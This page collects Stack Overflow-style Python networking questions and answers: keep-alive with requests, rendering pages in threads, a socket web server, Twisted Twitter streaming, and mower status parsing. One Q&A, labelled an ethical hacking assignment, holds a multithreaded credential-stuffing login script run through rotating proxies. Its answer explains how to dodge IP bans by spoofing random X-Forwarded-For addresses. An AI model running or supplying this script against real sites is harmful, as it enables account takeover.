Keep-alive messages not being sent when using Python requests module

I am observing that with the Python requests module, HTTP keep-alive is not being honored.
I don't see ACKs for keep-alive being sent from the host where I am running the Python script.
Please let me know how it can be fixed. The following is my code:
import json
import requests
import logging
import sys
import time
from threading import Thread

logging.basicConfig(level=logging.DEBUG)

class NSNitro:
    def __init__(self, *args):
        if len(args) > 2:
            self.ip = args[0]
            self.username = args[1]
            self.password = args[2]
            self.session_id = None
            url = 'http://' + self.ip + '/nitro/v1/config/login'
            payload = {"login": {"username": "nsroot", "password": "nsroot"}}
            headers = {"Content-type": "application/json", 'Connection': 'keep-alive'}
            try:
                r = requests.post(url=url, headers=headers, data=json.dumps(payload), timeout=5)
                logging.info(r.json()["sessionid"])
                if(r.json()["sessionid"] != None):
                    self.session_id = r.json()["sessionid"]
            except requests.exceptions.RequestException:
                logging.critical("Some error occurred during connection")
        else:
            logging.error("Not sufficient parameters provided. Required: ipaddress, username, password")

    def install_build(self, build_url):
        url = 'http://ip/nitro/v1/config/install'
        headers = {"Content-type": "application/json", "Connection": "keep-alive"}
        payload = {"install": {"url": build_url}}
        try:
            cookie = {"NITRO_AUTH_TOKEN": self.session_id}
            r = requests.post(timeout=5, url=url, data=json.dumps(payload), headers=headers, cookies=cookie)
        except requests.exceptions.RequestException:
            print("Connection Error occurred")
            raise  # re-raise so the caller sees the exception details
        else:
            assert r.status_code == 201, "Status code seen: " + str(r.status_code) + "\n" + \
                "Error message from system: " + r.json()["message"]
            print("Successfully triggered job on device to install build")

    def __del__(self):
        logging.debug("Deleted the object")

if __name__ == '__main__':
    ns_session = NSNitro(ip, username, password)
    url_i = 'https://myupload-server.net/build-13.0-480.16.tgz'
    t1 = Thread(target=ns_session.install_build, args=(url_i,))
    t1.start()
    # while t1.is_alive():
    #     t2 = Thread(target=ns_session.get_installed_version)
    #     t2.start()
    #     t2.join()
    time.sleep(100)
    logging.info("Install thread completed")
    t1.join()
    ns_session.logout()
When the request is posted using the curl command, the ACKs are sent at the specified keep-alive intervals. Without the ACKs being sent, the server resets the connection.
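Two things may be at play, assuming the missing "acks" are OS-level TCP keep-alive probes rather than anything at the HTTP layer. First, each bare requests.post() call opens its own connection, so nothing persists between calls; reusing one requests.Session() keeps the underlying TCP connection open. Second, requests does not enable SO_KEEPALIVE on its sockets by default, but it can be switched on through a custom transport adapter. A minimal sketch (the TCP_KEEP* intervals are illustrative, and those three constants are Linux-specific):

import socket
import requests
from requests.adapters import HTTPAdapter
from urllib3.connection import HTTPConnection

class KeepAliveAdapter(HTTPAdapter):
    # Pass TCP keep-alive socket options down to urllib3's connection pool.
    def init_poolmanager(self, *args, **kwargs):
        kwargs['socket_options'] = HTTPConnection.default_socket_options + [
            (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),     # enable keep-alive probes
            (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 30),   # idle time before first probe
            (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10),  # seconds between probes
            (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 3),     # failed probes before drop
        ]
        super(KeepAliveAdapter, self).init_poolmanager(*args, **kwargs)

session = requests.Session()            # one session, one persistent connection
session.mount('http://', KeepAliveAdapter())

The NSNitro class could then hold such a session and call session.post(...) in both __init__ and install_build, so the login and install requests share a single kept-alive connection.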

Related

How to use html.render inside a thread?

When I try to hand a function off to a thread that parses the page and then executes html.render, an error occurs:
Error: There is no current event loop in thread 'Thread-1 (take_proxy_us_spys_one_thread)
I found a discussion of a similar problem and saw that someone there apparently managed to make this work, but I still get the error.
Here is my code, which is supposed to run repeatedly.
Please help me understand what is going on.
import urllib3
import requests
import time
from requests_html import HTMLSession
import threading
import fake_useragent

def take_proxy_us_spys_one(urls: list = [], header: dict = None):
    for url in urls:
        try:
            url_first = 'https://spys.one'
            r = requests.get(url_first, headers=header)
            cookies = r.cookies
            session = HTMLSession()
            r = session.post(url,
                             data={'xx00': '', 'xpp': '5', 'xf1': '0', 'xf2': '0',
                                   'xf3': '0', 'xf4': '0', 'xf5': '0'},
                             headers=header,
                             cookies=cookies)
            r.html.render(reload=False)
            print(str(r))
        except Exception as exc:
            print("Error: " + str(exc))

def take_proxy_us_spys_one_thread(event, sleeptime=60, urls=[], lock=None):
    while event.is_set():
        try:
            user = fake_useragent.UserAgent().random
            header = {'User-Agent': user}
            lock.acquire() if lock is not None else None
            proxies_1 = take_proxy_us_spys_one(urls=urls, header=header)
            lock.release() if lock is not None else None
            time.sleep(sleeptime)
        except Exception as exc:
            print("Error: " + str(exc))
            time.sleep(sleeptime)

if __name__ == '__main__':
    start_in_thread = True
    urllib3.disable_warnings()
    urls_spys_one = [
        'https://spys.one/free-proxy-list/ALL/'
    ]
    lock = threading.Lock()
    event = threading.Event()
    event.set()
    t2 = threading.Thread(target=take_proxy_us_spys_one_thread,
                          args=(event, 10, urls_spys_one, lock)).start()
I tried to implement the mechanism from here.
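A plausible fix, assuming the error comes from requests_html driving its headless browser through asyncio: a freshly spawned thread has no asyncio event loop, which is exactly what the message says, so create one at the top of the thread function before anything calls render():

import asyncio

def take_proxy_us_spys_one_thread(event, sleeptime=60, urls=[], lock=None):
    # Worker threads get no event loop by default; requests_html's render()
    # needs one, so create and register a loop for this thread first.
    asyncio.set_event_loop(asyncio.new_event_loop())
    while event.is_set():
        ...  # rest of the loop unchanged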

Python socket programmed web server doesn't send information to browser

I created a simple web server using Python socket programming. When I access it with a socket-based client, I get this response (which looks fine):
HTTP/1.0 200 OK
Content-Length: 145
Content-Type: text/html
"""<!DOCTYPE html>
<html>
<body>
<h2>HTML Links</h2>
<p>Visit our HTML tutorial</p>
</body>
</html>"""
However, when I try to access 127.0.0.1:80 in the browser, it says:
127.0.0.1 didn’t send any data. ERR_EMPTY_RESPONSE
Web Server Code:
import socket
import os

def get_content_type(filename):
    index = filename.rfind('.')
    extension = filename[index+1:len(filename)]
    if(extension == 'txt' or extension == 'html'):
        return 'Content-Type: text/html\n'
    elif(extension == 'jpg'):
        return 'Content Type: image/jpeg\n'
    elif(extension == 'js'):
        return 'Content Type: text/javascript; charset=UTF 8\n'
    elif(extension == 'css'):
        return 'Content Type: text/css\n'
    pass

def check_client_request(client_request):
    request_splitted = client_request.split()
    if(len(request_splitted) != 3):
        return False
    if(request_splitted[0] != 'GET'):
        return False
    if(request_splitted[1].find('http://') != 0):
        return False
    if(request_splitted[1].count('/') < 3):
        return False
    if(request_splitted[2] != 'HTTP/1.1\\r\\n'):
        return False
    return True

def recieve_client_request(client_socket):
    client_request = client_socket.recv(1024)
    return client_request.decode('utf-8')

def handle_client_request(request):
    try:
        filename = request.split()[1].split('/')[3]
    except:
        return 'File not found'
    if(filename == ''):
        filename = 'index.html'
    path = f'C:\\Users\\Eitan\\Desktop\\Python-Course\\SOCKETWEBSERVER\\{filename}'
    print(path)
    response = ''
    if(os.path.isfile(path)):
        try:
            requested_file = open(path, 'r')
            file_content = requested_file.read()
            requested_file.close()
            response = 'HTTP/1.0 200 OK\n'
            content_length = len(file_content.encode('utf-8'))
            response += f'Content-Length: {content_length}\n'
            response += get_content_type(filename)
            response += '\n'
            response += f'"""{file_content}"""'
        except:
            response = 'HTTP/1.1 404 Not Found\n'
    else:
        response = 'HTTP/1.1 404 Not Found\n'
    return response

def send_response(client_socket, response):
    try:
        client_socket.send(response.encode('utf-8'))
        print('Response Sent')
    except:
        print('Couldnt send response.')

def main():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', 80))
    server_socket.listen(1)
    while True:
        client_socket = server_socket.accept()[0]
        client_request = recieve_client_request(client_socket)
        if(check_client_request(client_request)):
            response = handle_client_request(client_request)
            send_response(client_socket, response)
            client_socket.close()
        else:
            client_socket.close()

if(__name__ == '__main__'):
    main()
Client Code:
import socket

def main():
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('127.0.0.1', 80))
    request = input("Command: ").encode('utf-8')
    client_socket.send(request)
    response = client_socket.recv(1024)
    print(response.decode('utf-8'))

if(__name__ == '__main__'):
    main()
if(request_splitted[1].find('http://') != 0):
    return False
You expect the browser to send a request like this:
GET http://domain/page HTTP/1.1
...
But a normal HTTP request does not include the protocol and host, only the path, i.e. it looks like this:
GET /page HTTP/1.1
...
Since you treat the valid request from the browser as invalid, you close the connection, and thus no response is sent to the browser.
Note that HTTP is not as simple as it might look. There is an actual standard for this, which is quite long and which you are expected to follow when implementing an HTTP server or client.
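One way the check could be adjusted to accept what browsers actually send (a sketch; note that str.split() also discards the trailing CRLF, so the original comparison against a version string ending in '\r\n' could never match either):

def check_client_request(client_request):
    request_splitted = client_request.split()
    if(len(request_splitted) != 3):
        return False
    if(request_splitted[0] != 'GET'):
        return False
    # browsers send an origin-form target: a path beginning with '/'
    if(not request_splitted[1].startswith('/')):
        return False
    # split() has already stripped the trailing '\r\n'
    if(request_splitted[2] != 'HTTP/1.1'):
        return False
    return True

handle_client_request would need a matching change, since its request.split()[1].split('/')[3] indexing assumes an absolute URL rather than a path like /index.html.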

Sending Asynchronous requests with Python requests library

As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that, I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from math import ceil
from time import sleep

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
1. In an attempt to make multiple requests using multiple sessions, it's somehow failing to keep the sessions distinct because it doesn't support asynchronicity.
2. The victim site bans IPs in groups, e.g. banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs.
3. The victim site is using headers like X-Forwarded-For, Client-IP, Via, or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a lifesaver.
I was using elite-level proxies, so there was no way the victim site could have found my IP address from the proxy itself; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was the latest address in the X-Forwarded-For chain. The solution is to set the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
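For completeness, a self-contained version of that line (note it needs random imported, which the script above does not do):

import random

def random_ip():
    # build a random dotted quad so each request carries a fresh
    # X-Forwarded-For value
    return '.'.join([str(random.randint(0, 255)) for i in range(4)])

header = get_default_header()           # helper defined in the script above
header['X-Forwarded-For'] = random_ip()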

Twisted Twitter streaming API bad request error

I am using Python Twisted to get streaming data from the Twitter streaming API. In short, there are two steps: 1) get an access_token, 2) use the access_token to request the data.
Step 1 works completely fine, but at step 2 I am getting this bad request error, status 400. Why is that? I think it's because Twitter uses HTTP/1.1 and Twisted uses HTTP/1.0 by default. If so, how do I upgrade the connections to HTTP/1.1?
EDIT: Here is my error message
HTTP/1.0 400 Bad Request
content-length: 0
date: Sun, 12 Mar 2017 14:57:13 GMT
server: tsa
x-connection-hash: dca361a2b4214ad66203e9912b05cf7f
[Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
]
#!/usr/bin/python
import oauth2 as oauth
import urlparse
import time
import webbrowser
from twisted.internet import reactor, protocol, ssl
from twisted.web import http

CONSUMER_KEY = 'xxxx'
CONSUMER_SECRET = 'xxxx'
CONSUMER = oauth.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
ACCESS_TOKEN_FILE = 'OAUTH_ACCESS_TOKEN'
TWITTER_REQUEST_TOKEN_URL = 'https://twitter.com/oauth/request_token'
TWITTER_ACCESS_TOKEN_URL = 'https://twitter.com/oauth/access_token'
TWITTER_AUTHORIZE_URL = 'https://twitter.com/oauth/authorize'
TWITTER_STREAM_API_HOST = 'stream.twitter.com'
TWITTER_STREAM_API_PATH = '/1.1/statuses/sample.json'

class TwitterStreamer(http.HTTPClient):
    def connectionMade(self):
        self.sendCommand('GET', self.factory.url)
        self.sendHeader('Host', self.factory.host)
        self.sendHeader('User-Agent', self.factory.agent)
        self.sendHeader('Authorization', self.factory.oauth_header)
        self.endHeaders()

    def handleStatus(self, version, status, message):
        if status != '200':
            self.factory.tweetError(ValueError("bad status"))

    def lineReceived(self, line):
        self.factory.tweetReceived(line)

    def connectionLost(self, reason):
        self.factory.tweetError(reason)

class TwitterStreamerFactory(protocol.ClientFactory):
    protocol = TwitterStreamer

    def __init__(self, oauth_header):
        self.url = TWITTER_STREAM_API_PATH
        self.agent = 'Twisted/TwitterStreamer'
        self.host = TWITTER_STREAM_API_HOST
        self.oauth_header = oauth_header

    def clientConnectionFailed(self, _, reason):
        self.tweetError(reason)

    def tweetReceived(self, tweet):
        print tweet

    def tweetError(self, error):
        print error

def save_access_token(key, secret):
    with open(ACCESS_TOKEN_FILE, 'w') as f:
        f.write("ACCESS_KEY=%s\n" % key)
        f.write("ACCESS_SECRET=%s\n" % secret)

def load_access_token():
    with open(ACCESS_TOKEN_FILE) as f:
        lines = f.readlines()
        str_key = lines[0].strip().split('=')[1]
        str_secret = lines[1].strip().split('=')[1]
        return oauth.Token(key=str_key, secret=str_secret)

def fetch_access_token():
    CONSUMER_KEY = 'xxxxxxxx'
    CONSUMER_SECRET = 'xxxxxxxxx'
    ACCESS_KEY = "xxxxxxx"
    ACCESS_SECRET = "xxxxxxxxx"
    consumer = oauth.Consumer(key=CONSUMER_KEY, secret=CONSUMER_SECRET)
    access_token = oauth.Token(key=ACCESS_KEY, secret=ACCESS_SECRET)
    return (access_token.key, access_token.secret)

def build_authorization_header(access_token):
    url = "https://%s%s" % (TWITTER_STREAM_API_HOST, TWITTER_STREAM_API_PATH)
    params = {
        'oauth_version': "1.0",
        'oauth_nonce': oauth.generate_nonce(),
        'oauth_timestamp': str(int(time.time())),
        'oauth_token': access_token.key,
        'oauth_consumer_key': CONSUMER.key
    }
    # Sign the request.
    # For some messed up reason, we need to specify is_form_encoded to prevent
    # the oauth2 library from setting oauth_body_hash which Twitter doesn't like.
    req = oauth.Request(method="GET", url=url, parameters=params, is_form_encoded=True)
    req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), CONSUMER, access_token)
    # Grab the Authorization header
    header = req.to_header()['Authorization'].encode('utf-8')
    print "Authorization header:"
    print " header = %s" % header
    return header

if __name__ == '__main__':
    # Check if we have saved an access token before.
    try:
        f = open(ACCESS_TOKEN_FILE)
    except IOError:
        # No saved access token. Do the 3-legged OAuth dance and fetch one.
        (access_token_key, access_token_secret) = fetch_access_token()
        # Save the access token for next time.
        save_access_token(access_token_key, access_token_secret)
    # Load access token from disk.
    access_token = load_access_token()
    # Build Authorization header from the access_token.
    auth_header = build_authorization_header(access_token)
    # Twitter stream using the Authorization header.
    twsf = TwitterStreamerFactory(auth_header)
    reactor.connectSSL(TWITTER_STREAM_API_HOST, 443, twsf, ssl.ClientContextFactory())
    reactor.run()
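That hunch about the HTTP version matches what the code is doing: twisted.web.http.HTTPClient (used above) writes an HTTP/1.0 request line from sendCommand, while the higher-level twisted.web.client.Agent speaks HTTP/1.1, which is what the working code below switches to. For comparison, a minimal Agent request looks like:

from twisted.internet import reactor
from twisted.web.client import Agent
from twisted.web.http_headers import Headers

agent = Agent(reactor)  # Agent issues HTTP/1.1 requests over the reactor
d = agent.request('GET', 'https://stream.twitter.com/1.1/statuses/sample.json',
                  Headers({'User-Agent': ['Twisted/TwitterStreamer']}), None)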
UPDATE: Working code:
import base64, urllib
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.protocols import basic
from twisted.python.failure import DefaultException
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
import json
import oauth2 as oauth
import time
from twisted.web import server, resource
from twisted.internet import endpoints
from twisted.web.server import Site

CONSUMER_KEY = 'xxxxxxxxxxxx'
CONSUMER_SECRET = 'xxxxxxxxxxxxxx'
TWITTER_STREAM_API_HOST = 'stream.twitter.com'
TWITTER_STREAM_API_PATH = '/1.1/statuses/sample.json'
ACCESS_TOKEN_FILE = 'OAUTH_ACCESS_TOKEN'
CONSUMER = oauth.Consumer(CONSUMER_KEY, CONSUMER_SECRET)

def callback(result):
    print result

def errback(error):
    print error

class StreamingParser(basic.LineReceiver):
    delimiter = '\r\n'

    def __init__(self, user_callback, user_errback):
        self.user_callback = user_callback
        self.user_errback = user_errback

    def lineReceived(self, line):
        d = Deferred()
        d.addCallback(self.user_callback)
        d.addErrback(self.user_errback)
        line = line.strip()
        print line, '........'
        try:
            d.callback(json.loads(line))
        except ValueError, e:
            if self.user_errback:
                d.errback(e)

    def connectionLost(self, reason):
        if self.user_errback:
            d = Deferred()
            d.addErrback(self.user_errback)
            d.errback(DefaultException(reason.getErrorMessage()))

def _get_response(response, callback, errback):
    print 'got response......'
    response.deliverBody(StreamingParser(callback, errback))
    return Deferred()

def _shutdown(reason, errback):
    d = Deferred()
    d.addErrback(errback)
    d.errback(reason)
    if reactor.running:
        reactor.stop()

def save_access_token(key, secret):
    with open(ACCESS_TOKEN_FILE, 'w') as f:
        f.write("ACCESS_KEY=%s\n" % key)
        f.write("ACCESS_SECRET=%s\n" % secret)

def load_access_token():
    with open(ACCESS_TOKEN_FILE) as f:
        lines = f.readlines()
        str_key = lines[0].strip().split('=')[1]
        str_secret = lines[1].strip().split('=')[1]
        return oauth.Token(key=str_key, secret=str_secret)

def fetch_access_token():
    ACCESS_KEY = "xxxxx-xxxx"
    ACCESS_SECRET = "xxxxxxxxxxxx"
    access_token = oauth.Token(key=ACCESS_KEY, secret=ACCESS_SECRET)
    return (access_token.key, access_token.secret)

def make_header(access_token):
    url = "https://%s%s" % (TWITTER_STREAM_API_HOST, TWITTER_STREAM_API_PATH)
    params = {
        # "Authorization": "Oauth %s" % auth,
        "oauth_version": "1.0",
        "oauth_nonce": oauth.generate_nonce(),
        "oauth_timestamp": str(int(time.time())),
        "oauth_token": access_token.key,
        "oauth_consumer_key": CONSUMER.key
    }
    req = oauth.Request(method="GET", url=url, parameters=params, is_form_encoded=True)
    req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), CONSUMER, access_token)
    header = req.to_header()['Authorization'].encode('utf-8')
    print "Authorization header:"
    print " header = %s" % header
    return header

def start_streaming():
    print 'streaming started...........'
    try:
        f = open(ACCESS_TOKEN_FILE)
    except IOError:
        access_token_key, access_token_secret = fetch_access_token()
        save_access_token(access_token_key, access_token_secret)
    access_token = load_access_token()
    auth_header = make_header(access_token)
    url = 'https://stream.twitter.com/1.1/statuses/sample.json'
    headers = Headers({
        'User-Agent': ['TwistedSTreamReciever'],
        'Authorization': [auth_header]})
    agent = Agent(reactor)
    d = agent.request('GET', url, headers, None)
    d.addCallback(_get_response, callback, errback)
    d.addBoth(_shutdown, errback)
    # reactor.run()

class _Stream(resource.Resource):
    isLeaf = True

    def render_GET(self, request):
        start_streaming()  # Streaming started here.......
        time.sleep(8)  # wait for 8 seconds...
        # ........??? stop streaming here??
        return "<html>streaming started...........%s</html>" % (time.ctime(),)

if __name__ == "__main__":
    resource = _Stream()
    factory = Site(resource)
    endpoint = endpoints.TCP4ServerEndpoint(reactor, 8880)
    endpoint.listen(factory)
    reactor.run()
To give up on reading a particular streaming response (which it seems may be necessary - I'm guessing these Twitter streams never end on their own) and close the connection associated with that request/response (because HTTP has no other way to give up on a response), use the body delivery protocol's transport.loseConnection method. So, for example:
def _get_response(response, callback, errback):
    print 'got response......'
    proto = StreamingParser(callback, errback)
    save_stream_by_name(stream_name, proto)
    response.deliverBody(proto)
    return Deferred()
When you're done with that stream:
pop_stream_by_name(stream_name).transport.loseConnection()
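The answer references save_stream_by_name and pop_stream_by_name without defining them; they are presumably just bookkeeping. A minimal sketch, assuming a module-level registry keyed by a stream name of your choosing:

_streams = {}  # in-flight StreamingParser protocols by name

def save_stream_by_name(stream_name, proto):
    _streams[stream_name] = proto

def pop_stream_by_name(stream_name):
    # remove and return the protocol so its transport can be closed
    return _streams.pop(stream_name)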

Python split up data from print string

This is my first post here, so if it doesn't follow the standard, you know why.
I am really new to Python and programming; I am trying to learn as I go.
I am using a script that controls my Husqvarna Automower.
In that script there is a line that I don't understand and whose output I would like to change:
print(dict(mow.status()['mowerInfo']))
When I run the script, I get a printout like this:
{u'storedTimestamp': u'1472541846629', u'hdop': u'0.0', u'latitude': u'57.57320833333333', u'lastErrorCode': u'0', u'nextStartTimestamp': u'1472587200', u'mowerStatus': u'PARKED_TIMER', u'cachedSettingsUUID': u'c1029c29-ecd5-48bd-a27b-fa98c6985ff0', u'hostMessage': u'0', u'configChangeCounter': u'846', u'longitude': u'12.04773', u'nextStartSource': u'WEEK_TIMER', u'secondsOld': u'-1471069304597', u'gpsStatus': u'USING_GPS_MAP', u'gsmRssi': u'0', u'batteryPercent': u'100', u'connected': u'true', u'operatingMode': u'AUTO', u'lastErrorCodeTimestamp': u'0'}
I understand that this line executes the "status" function and prints the outcome, but I don't really understand the dict and the ['mowerInfo'] part, and why I can't find any reference to ['mowerInfo'] anywhere else in the script. As I understand it, there should be a dictionary in the script, but I can't find it.
And now to the actual question:
Instead of the print command, I would like to get some of the information parsed into variables instead.
For example, I would like to have a variable called mowerStatus that holds the value PARKED_TIMER and a variable called batteryPercent that holds the value 100.
The script is run by a smart-home solution called Indigodomo on a Mac using Python 2.6.
Does anyone know how to do that?
I have modified the script from the original;
here is my modified script (with my credentials XXed out):
import requests
import xmltodict

class API:
    _API_IM = 'https://tracker-id-ws.husqvarna.net/imservice/rest/'
    _API_TRACK = 'https://tracker-api-ws.husqvarna.net/services/'

    def __init__(self):
        self.session = requests.Session()
        self.device_id = None
        self.push_id = None

    def login(self, login, password):
        request = ("<login>"
                   "  <email>%s</email>"
                   "  <password>%s</password><language>fr-FR</language>"
                   "</login>") % (login, password)
        response = self.session.post(self._API_IM + 'im/login',
                                     data=request, headers={'Content-type': 'application/xml'})
        response.raise_for_status()
        self.session.headers.update({'Session-Token': response.headers['Session-Token']})
        self.select_first_robot()

    def logout(self):
        response = self.session.post(self._API_IM + 'im/logout')
        response.raise_for_status()
        self.device_id = None
        del (self.session.headers['Session-Token'])

    def list_robots(self):
        response = self.session.get(self._API_TRACK + 'pairedRobots_v2')
        response.raise_for_status()
        result = xmltodict.parse(response.content)
        return result

    def select_first_robot(self):
        result = self.list_robots()
        self.device_id = result['robots']['robot']['deviceId']

    def status(self):
        response = self.session.get(self._API_TRACK + 'robot/%s/status_v2/' % self.device_id)
        response.raise_for_status()
        result = xmltodict.parse(response.content)
        return result

    def geo_status(self):
        response = self.session.get(self._API_TRACK + 'robot/%s/geoStatus/' % self.device_id)
        response.raise_for_status()
        result = xmltodict.parse(response.content)
        return result

    def get_mower_settings(self):
        request = ("<settings>"
                   "  <autoTimer/><gpsSettings/><drivePastWire/>"
                   "  <followWireOut><startPositionId>1</startPositionId></followWireOut>"
                   "  <followWireOut><startPositionId>2</startPositionId></followWireOut>"
                   "  <followWireOut><startPositionId>3</startPositionId></followWireOut>"
                   "  <followWireOut><startPositionId>4</startPositionId></followWireOut>"
                   "  <followWireOut><startPositionId>5</startPositionId></followWireOut>"
                   "  <followWireIn><loopWire>RIGHT_BOUNDARY_WIRE</loopWire></followWireIn>"
                   "  <followWireIn><loopWire>GUIDE_1</loopWire></followWireIn>"
                   "  <followWireIn><loopWire>GUIDE_2</loopWire></followWireIn>"
                   "  <followWireIn><loopWire>GUIDE_3</loopWire></followWireIn>"
                   "  <csRange/>"
                   "  <corridor><loopWire>RIGHT_BOUNDARY_WIRE</loopWire></corridor>"
                   "  <corridor><loopWire>GUIDE_1</loopWire></corridor>"
                   "  <corridor><loopWire>GUIDE_2</loopWire></corridor>"
                   "  <corridor><loopWire>GUIDE_3</loopWire></corridor>"
                   "  <exitAngles/><subareaSettings/>"
                   "</settings>")
        response = self.session.post(self._API_TRACK + 'robot/%s/settings/' % self.device_id,
                                     data=request, headers={'Content-type': 'application/xml'})
        response.raise_for_status()
        result = xmltodict.parse(response.content)
        return result

    def settingsUUID(self):
        response = self.session.get(self._API_TRACK + 'robot/%s/settingsUUID/' % self.device_id)
        response.raise_for_status()
        result = xmltodict.parse(response.content)
        return result

    def control(self, command):
        if command not in ['PARK', 'STOP', 'START']:
            raise Exception("Unknown command")
        request = ("<control>"
                   "  <action>%s</action>"
                   "</control>") % command
        response = self.session.put(self._API_TRACK + 'robot/%s/control/' % self.device_id,
                                    data=request, headers={'Content-type': 'application/xml'})
        response.raise_for_status()

    def add_push_id(self, id):
        request = "id=%s&platform=iOS" % id
        response = self.session.post(self._API_TRACK + 'addPushId', data=request,
                                     headers={'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
        response.raise_for_status()
        self.push_id = id

    def remove_push_id(self):
        request = "id=%s&platform=iOS" % id
        response = self.session.post(self._API_TRACK + 'removePushId', data=request,
                                     headers={'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
        response.raise_for_status()
        self.push_id = None

if __name__ == '__main__':
    retry = 5
    while retry > 0:
        try:
            mow = API()
            mow.login("xxx@xxx.com", "xxxxxx")
            print(dict(mow.status()['mowerInfo']))
            retry = 0
        except Exception as ex:
            retry -= 1
            if retry == 0:
                print("[ERROR] Failed to send the command")
                exit(1)
            else:
                print("[ERROR] Retrying to send the command")
    print("Done")
    mow.logout()
    exit(0)
The original project and script can be found here:
https://github.com/chrisz/pyhusmow
Thanks, Martin:
dic_info = dict(mow.status()['mowerInfo'])
mowerStatus = dic_info.get('mowerStatus')
batteryPercent = dic_info.get('batteryPercent')
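One detail to keep in mind: xmltodict parses every value as a string (note the u'100' in the printout above), so numeric fields need an explicit conversion. A usage sketch:

dic_info = dict(mow.status()['mowerInfo'])
mowerStatus = dic_info.get('mowerStatus')              # e.g. 'PARKED_TIMER'
batteryPercent = int(dic_info.get('batteryPercent'))   # '100' -> 100
print(mowerStatus, batteryPercent)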
